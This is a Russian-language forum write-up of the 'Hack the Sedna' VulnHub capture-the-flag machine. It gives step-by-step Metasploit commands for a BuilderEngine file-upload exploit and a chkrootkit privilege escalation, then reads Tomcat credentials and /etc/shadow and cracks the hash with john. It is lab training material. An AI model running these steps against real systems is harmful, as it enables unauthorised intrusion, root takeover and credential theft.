ANTICHAT - CTF. Challenge. Hack The Sedna

Всем привет! В этой статье, я хочу показать взлом уязвимой виртуальной машины, в рамках CTF Challenge.

Итак, Hack the Sedna.

Качаем VM образ отсюда – https://download.vulnhub.com/hackfest2016/

Открываем его в VM Ware и запускаем, в качестве атакующего хоста Kali Linux 2017.2

https://forum.antichat.xyz/attachmen...3fc0300043.png

На скриншоте видно, по какому адресу находится уязвимая VM, просканируем для начала порты:

> nmap –sV –A 172.16.0.146

Результатом будет много информации:

https://forum.antichat.xyz/attachmen...679660af82.png

Дальше было предпринято несколько попыток сканирования и брута, но ощутимых результатов они не принесли. Сразу скажу, что при сканировании с помощью nikto, он обнаруживает файл license.txt где и скрыта подсказка.

https://forum.antichat.xyz/attachmen...4b856920df.png

Вот собственно и она:

https://forum.antichat.xyz/attachmen...f4cf3e11d1.png

Если пойти в Google по этому слову, то одна из первых ссылок укажет нам на эксплоит, до этого, о существовании друг друга мы с ним не знали - BuilderEngine Arbitrary File Upload Vulnerability and execution.

Этот модуль использует уязвимость, найденную в BuilderEngine 3.5.0 через elFinder 2.0. Плагин jquery-file-upload имеет возможность загрузки вредоносного файла, что приведет к произвольному выполнению удаленного кода в контексте веб-сервера.

Запускаем Metasploit Framework:

> msfconsole

> use exploit/multi/http/builderengine_upload_exec

> show targets

> set target 0 (Выбираем таргет)

https://forum.antichat.xyz/attachmen...23baf6ad69.png

Смотрим опции и указываем целевой хост:

> show options

> set rhost 172.16.0.146

> exploit

Если все прошло успешно, то получаем активную сессию meterpreter:

https://forum.antichat.xyz/attachmen...daeff92bec.png

В директории /var/www – находим флаг.

https://forum.antichat.xyz/attachmen...f36672d0bd.png

Дальнейшие поиски привели меня в директорию /etc/chkrootkit/, где любопытным оказался файл README, читаем его:

> cat README

https://forum.antichat.xyz/attachmen...fe044e9de9.png

Опять, топаем в Google, за информацией о chkrootkit и как его наличие в системе, может нам помочь.

Chkrootkit -представляет собой сканер, который по тем или иным признакам поиска, отслеживает наличие руткита в локальной системе. Программа имеет несколько модулей, для поиска руткитов и других небезопасных объектов:

· chkrootkit - проверка системы.

· ifpromisc - обнаружение режима захвата пакетов.

· chklastlog - обнаружение факта удаления записей из файла lastlog.

· chkwtmp - то же, из файла wtmp.

· chkproc - обнаружение следов трояна (LKM).

· strings - поиск и замена текстовых строк.

А, погуглив еще немного, можно найти информацию о модуле Metasploit - Chkrootkit - Privilege Escalation (Metasploit)

Chkrootkit до версии 0.50 будет запускать любой исполняемый файл с именем / tmp / update с правами root, что позволяет осуществить тривиальную эскалацию привилегий. WfsDelay настроен на период 24 часа, так как, по умолчанию, с такой частотой выполняется проверка chkrootkit.

Нам все подходит, версия нашего Chkrootkit, 0.49, значит должна успешно про эксплуатироваться.

Сворачиваем активную сессию и активируемChkrootkit - Privilege Escalation:

> background

> use exploit/unix/local/chkrootkit

> show targets

> show options (можно оставлять все по умолчанию, кроме параметра – сессия)

> set session 1

https://forum.antichat.xyz/attachmen...20f0187ff3.png

Затем запускаем эксплоит, немного ждем, затем:

> sessions

https://forum.antichat.xyz/attachmen...29623e60db.png

Выберем вторую сессию и осмотримся:

> session –I 2

> pwd

> ls –l

> cat flag.txt (забираем второй флаг)

https://forum.antichat.xyz/attachmen...badf9b4828.png

Теперь мы root, продолжим ковыряния VM. В папке /etc/tomcat7 в файле tomcat-users.xml

Можно обнаружить логин и пароль от Tomcat7. Tomcat — контейнер сервлетов с открытым исходным кодом, разрабатываемый Apache Software Foundation. Реализует спецификацию сервлетов и спецификацию JavaServer Pages (JSP) и JavaServer Faces (JSF). Tomcat позволяет запускать веб-приложения, содержит ряд программ для самоконфигурирования.

Tomcat используется в качестве самостоятельного веб-сервера, в качестве сервера контента в сочетании с веб-сервером Apache HTTP Server, а также в качестве контейнера сервлетов в серверах приложений JBoss и GlassFish.

https://forum.antichat.xyz/attachmen...9a49c90d28.png

Используем полученные данные для доступа к tomcat:

> 172.16.0.146:8080/manager/html (по этому адресу находится административная панель)

https://forum.antichat.xyz/attachmen...563a021bbc.png

Я полагаю, это и есть 3-ий пост эксплуатационный флаг.

https://forum.antichat.xyz/attachmen...3076c01f1d.png

Четвертый, и последний флаг, подсказку можно увидеть в директории:

> сd /etc

> сat shadow

https://forum.antichat.xyz/attachmen...adc0df5bb1.png

Shadow и зачем он нужен:

Кроме имени (первое поле каждой строки) и хеша (второе поле) здесь также хранятся

· дата последнего изменения пароля,

· через сколько дней можно будет поменять пароль,

· через сколько дней пароль устареет,

· за сколько дней до того, как пароль устареет, начать напоминать о необходимости смены пароля,

· через сколько дней после того, как пароль устареет, заблокировать учётную запись пользователя,

· дата, при достижении которой учётная запись блокируется,

· зарезервированное поле.

https://forum.antichat.xyz/attachmen...271b6a0605.png

Копируем хэш (это и есть последний флаг) и все остальное в отдельный файл на атакующем хосте:

https://forum.antichat.xyz/attachmen...7b20a9568d.png

Затем используем john с опцией –single для расшифровки хэша:

> john –single sedna.txt

https://forum.antichat.xyz/attachmen...85442de9e2.png

Все флаги найдены. На этом все, спасибо за внимание.